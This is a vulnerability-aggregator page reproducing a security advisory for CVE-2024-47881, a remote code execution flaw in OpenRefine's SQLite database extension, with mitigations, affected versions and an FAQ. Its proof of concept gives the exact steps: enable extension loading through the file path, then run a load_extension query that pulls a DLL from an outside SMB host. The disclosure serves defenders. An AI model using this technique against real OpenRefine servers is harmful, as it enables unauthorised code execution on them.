8.8
CWE
89
Advisory Published
CVE Published
Updated

CVE-2024-47881: OpenRefine's SQLite integration allows filesystem access, remote code execution (RCE)

First published: Thu Oct 24 2024(Updated: )

### Summary In the `database` extension, the "enable_load_extension" property can be set for the SQLite integration, enabling an attacker to load (local or remote) extension DLLs and so run arbitrary code on the server. The attacker needs to have network access to the OpenRefine instance. ### Details The `database` extension, with some restrictions, lets users connect to any database they wish by filling in different parts of the JDBC URL that is used. For the SQLite integration, the extension expects a file path pointing to a database file (or a place where such a file can be created). This means that users can: * Read files on local or SMB filesystems, provided they are SQLite databases. * Write to files on local or SMB filesystems, as long as those files are either SQLite databases or empty. This seems to be the expected behavior. However, by adding `?enable_load_extension=true` to the filename, a [feature](https://www.sqlite.org/loadext.html) is toggled that additionally allows loading and executing shared libraries mentioned in queries, leading to remote code execution. On Windows specifically, those libraries may also come from shared folders. Possible mitigation and hardening steps could include: - Having users upload the SQLite database file they want to look at, storing it under some safe name, then opening that, rather than accepting a file path - If that is not feasible: making the path relative to, and checking that it does not escape, the workspace directory - If that is also not feasible: adding additional checks so that the path at least does not point to other machines or add JDBC parameters - Always using the READONLY open mode - Explicitly setting enable_load_extension to off - Enforcing [stricter limits](https://www.sqlite.org/security.html) and similar precautions ### PoC Tested on a Windows 11 machine. 1. Start OpenRefine and choose "Create project", "Database", database type "SQLite". 2. Type a writable file path followed by `?enable_load_extension=true`. 3. Click Connect. The connection should succeed. 4. Use `SELECT load_extension('\\wandernauta.nl\public\libcalculator.dll');` as the query. 5. Assuming there are no firewalls in the way, a few Windows calculators should open. The same file is available from https://wandernauta.nl/libcalculator.dll if needed. ### Impact Remote code execution for attackers with network access to OpenRefine.

Credit: security-advisories@github.com

Affected SoftwareAffected VersionHow to fix
maven/org.openrefine:database>=3.4-beta<3.8.3
3.8.3
Openrefine Openrefine>=3.4<3.8.3
debian/openrefine<=3.6.2-2+deb12u2
3.8.7-1

Never miss a vulnerability like this again

Sign up to SecAlerts for real-time vulnerability data matched to your software, aggregated from hundreds of sources.

Frequently Asked Questions

  • What is the severity of CVE-2024-47881?

    CVE-2024-47881 is considered a critical vulnerability due to its potential to allow arbitrary code execution on the server.

  • How do I fix CVE-2024-47881?

    To fix CVE-2024-47881, ensure that the 'enable_load_extension' property is set to false in the SQLite integration settings.

  • Who is affected by CVE-2024-47881?

    CVE-2024-47881 affects users of OpenRefine versions between 3.4 and 3.8.3 that utilize the database extension with SQLite integration.

  • What type of exploit is CVE-2024-47881?

    CVE-2024-47881 is an exploit that enables an attacker to load malicious extension DLLs to compromise the affected server.

  • Is network access required for CVE-2024-47881 exploitation?

    Yes, an attacker must have network access to the OpenRefine instance to exploit CVE-2024-47881.

Contact

SecAlerts Pty Ltd.
132 Wickham Terrace
Fortitude Valley,
QLD 4006, Australia
info@secalerts.co
By using SecAlerts services, you agree to our services end-user license agreement. This website is safeguarded by reCAPTCHA and governed by the Google Privacy Policy and Terms of Service. All names, logos, and brands of products are owned by their respective owners, and any usage of these names, logos, and brands for identification purposes only does not imply endorsement. If you possess any content that requires removal, please get in touch with us.
© 2025 SecAlerts Pty Ltd.
ABN: 70 645 966 203, ACN: 645 966 203